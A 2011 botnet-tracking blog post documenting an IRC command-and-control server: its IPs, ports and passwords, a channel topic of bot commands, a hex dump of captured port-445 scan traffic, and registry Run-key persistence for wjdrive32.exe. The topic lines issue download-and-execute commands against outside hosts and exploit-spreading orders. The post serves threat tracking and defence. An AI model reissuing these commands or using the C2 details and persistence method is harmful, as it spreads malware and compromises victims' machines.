jjjjjj.ahrampress.net(botnet hosted in China Beijing Chinanet Hebei Province Network)

By Pig, January 17, 2011

jjjjjj.ahrampress.net ip: 123.183.217.32
jjjjjj.ahrampress.net:6943
123.183.217.32 5943
123.183.217.32 6943
PASSWORD: eee
Nick [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #j
Channel: #j
Topic is ‘.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’
Set by minder48 on Mon Jan 17 17:58:06

Update:
Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
123.183.217.32 7196 PASS laorosr

00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3634 3739 BCB9 4020 3A20 5261 6E64 | P_6479..@ : Rand
00000030 | 6F6D 2050 6F72 7420 5363 616E 2073 7461 | om Port Scan sta
00000040 | 7274 6564 206F 6E20 3139 322E 782E 782E | rted on 192.x.x.
00000050 | 783A 3434 3520 7769 7468 2061 2064 656C | x:445 with a del
00000060 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000070 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000080 | 696E 6720 3235 2074 6872 6561 6473 2E0D | ing 25 threads..
00000090 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000000A0 | 415F 5850 5F36 3437 39BC B940 203A 2054 | A_XP_6479..@ : T
000000B0 | 7279 696E 6720 746F 2067 6574 2065 7874 | rying to get ext
000000C0 | 6572 6E61 6C20 4950 2E0D 0A50 5252 564D | ernal IP…PRRVM
000000D0 | 5347 205B 4E30 305F 5553 415F 5850 5F36 | SG [N00_USA_XP_6
000000E0 | 3437 39BC B940 203A 2052 616E 646F 6D20 | 479..@ : Random
000000F0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000100 | 6420 6F6E 2031 3932 2E31 3638 2E78 2E78 | d on 192.168.x.x
00000110 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000120 | 7920 6F66 2035 2073 6563 6F6E 6473 2066 | y of 5 seconds f
00000130 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
00000140 | 6E67 2032 3520 7468 7265 6164 732E 0D0A | ng 25 threads…
00000150 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
00000160 | 5F58 505F 3634 3739 BCB9 4020 3A20 5365 | _XP_6479..@ : Se
00000170 | 7175 656E 7469 616C 2050 6F72 7420 5363 | quential Port Sc
00000180 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000190 | 322E 3136 382E 302E 303A 3434 3520 7769 | 2.168.0.0:445 wi
000001A0 | 7468 2061 2064 656C 6179 206F 6620 3520 | th a delay of 5
000001B0 | 7365 636F 6E64 7320 666F 7220 3020 6D69 | seconds for 0 mi
000001C0 | 6E75 7465 7320 7573 696E 6720 3230 2074 | nutes using 20 t
000001D0 | 6872 6561 6473 2E0D 0A50 5252 564D 5347 | hreads…PRRVMSG
000001E0 | 205B 4E30 305F 5553 415F 5850 5F36 3437 | [N00_USA_XP_647
000001F0 | 39BC B940 203A 2053 6571 7565 6E74 6961 | 9..@ : Sequentia
00000200 | 6C20 506F 7274 2053 6361 6E20 7374 6172 | l Port Scan star
00000210 | 7465 6420 6F6E 2031 3932 2E31 3638 2E32 | ted on 192.168.2
00000220 | 3037 2E30 3A34 3435 2077 6974 6820 6120 | 07.0:445 with a
00000230 | 6465 6C61 7920 6F66 2035 2073 6563 6F6E | delay of 5 secon
00000240 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000250 | 2075 7369 6E67 2032 3020 7468 7265 6164 | using 20 thread
00000260 | 732E 0D0A 5052 5256 4D53 4720 5B4E 3030 | s…PRRVMSG [N00
00000270 | 5F55 5341 5F58 505F 3634 3739 BCB9 4020 | _USA_XP_6479..@
00000280 | 3A20 5365 7175 656E 7469 616C 2050 6F72 | : Sequential Por
00000290 | 7420 5363 616E 2073 7461 7274 6564 206F | t Scan started o
000002A0 | 6E20 3139 322E 302E 302E 303A 3434 3520 | n 192.0.0.0:445
000002B0 | 7769 7468 2061 2064 656C 6179 206F 6620 | with a delay of
000002C0 | 3520 7365 636F 6E64 7320 666F 7220 3020 | 5 seconds for 0
000002D0 | 6D69 6E75 7465 7320 7573 696E 6720 3130 | minutes using 10
000002E0 | 2074 6872 6561 6473 2E0D 0A4B 4349 4B20 | threads…KCIK
000002F0 | 5B4E 3030 5F55 5341 5F58 505F 3634 3739 | [N00_USA_XP_6479
00000300 | 3835 325D 18E7 400D 0A50 5252 564D 5347 | 852]..@..PRRVMSG
00000310 | 2023 6470 6920 3A20 5363 616E 6E65 7220 | #dpi : Scanner
00000320 | 7468 7265 6164 2073 746F 7070 6564 2E20 | thread stopped.
00000330 | 2831 3035 2074 6872 6561 6428 7329 2073 | (105 thread(s) s
00000340 | 746F 7070 6564 2E29 0D0A 5052 5256 4D53 | topped.)..PRRVMS
00000350 | 4720 2364 7069 203A 2052 616E 646F 6D20 | G #dpi : Random
00000360 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000370 | 6420 6F6E 2031 3932 2E78 2E78 2E78 3A34 | d on 192.x.x.x:4
00000380 | 3435 2077 6974 6820 6120 6465 6C61 7920 | 45 with a delay
00000390 | 6F66 2033 2073 6563 6F6E 6473 2066 6F72 | of 3 seconds for
000003A0 | 2030 206D 696E 7574 6573 2075 7369 6E67 | 0 minutes using
000003B0 | 2032 3520 7468 7265 6164 732E 0D0A 5052 | 25 threads…PR
000003C0 | 5256 4D53 4720 2364 7069 203A 2052 616E | RVMSG #dpi : Ran
000003D0 | 646F 6D20 506F 7274 2053 6361 6E20 7374 | dom Port Scan st
000003E0 | 6172 7465 6420 6F6E 2031 3932 2E31 3638 | arted on 192.168
000003F0 | 2E78 2E78 3A34 3435 2077 6974 6820 6120 | .x.x:445 with a
00000400 | 6465 6C61 7920 6F66 2033 2073 6563 6F6E | delay of 3 secon
00000410 | 6473 2066 6F72 2030 206D 696E 7574 6573 | ds for 0 minutes
00000420 | 2075 7369 6E67 2032 3520 7468 7265 6164 | using 25 thread
00000430 | 732E 0D0A 5052 5256 4D53 4720 2364 7069 | s…PRRVMSG #dpi
00000440 | 203A 2053 6571 7565 6E74 6961 6C20 506F | : Sequential Po
00000450 | 7274 2053 6361 6E20 7374 6172 7465 6420 | rt Scan started
00000460 | 6F6E 2031 3932 2E31 3638 2E32 3037 2E30 | on 192.168.207.0
00000470 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000480 | 7920 6F66 2033 2073 6563 6F6E 6473 2066 | y of 3 seconds f
00000490 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
000004A0 | 6E67 2032 3520 7468 7265 6164 732E 0D0A | ng 25 threads…
000004B0 | 7273 7372 2053 5032 2D31 3331 202A 2030 | rssr SP2-131 * 0
000004C0 | 203A 434F 4D50 5554 4552 4E41 4D45 0D0A | :COMPUTERNAME..
000004D0 | 7365 6E64 2023 212C 234D 6120 6F6F 6F6F | send #!,#Ma oooo
000004E0 | 0D0A 5052 5256 4D53 4720 2369 203A 4854 | ..PRRVMSG #i :HT
000004F0 | 5450 2053 4554 2068 7474 703A 2F2F 3931 | TP SET http://91
00000500 | 2E32 3137 2E31 3632 2E31 3034 2F61 6E65 | .217.162.104/ane
00000510 | 2E65 7865 0D0A 5052 5256 4D53 4720 5B4E | .exe..PRRVMSG [N
00000520 | 3030 5F55 5341 5F58 505F 3634 3739 BCB9 | 00_USA_XP_6479..
00000530 | 4020 3A20 5472 7969 6E67 2074 6F20 6765 | @ : Trying to ge
00000540 | 7420 6578 7465 726E 616C 2049 502E 0D0A | t external IP…

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun]
Microsoft Driver Setup = “%Windir%wjdrive32.exe”
so that wjdrive32.exe runs every time Windows starts
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
Microsoft Driver Setup = “%Windir%wjdrive32.exe”
C:WINDOWSwjdrive32.exe

infos about hosting:
http://whois.domaintools.com/123.183.217.32

Categories: Uncategorized

Previous postdc.drwhox.com(botnet hosted in China Beijing Chinanet Hebei Province Network)

Next posta1b.dyndns.tv(botnet hosted in Malaysia Kuala Lumpur Piradius Net)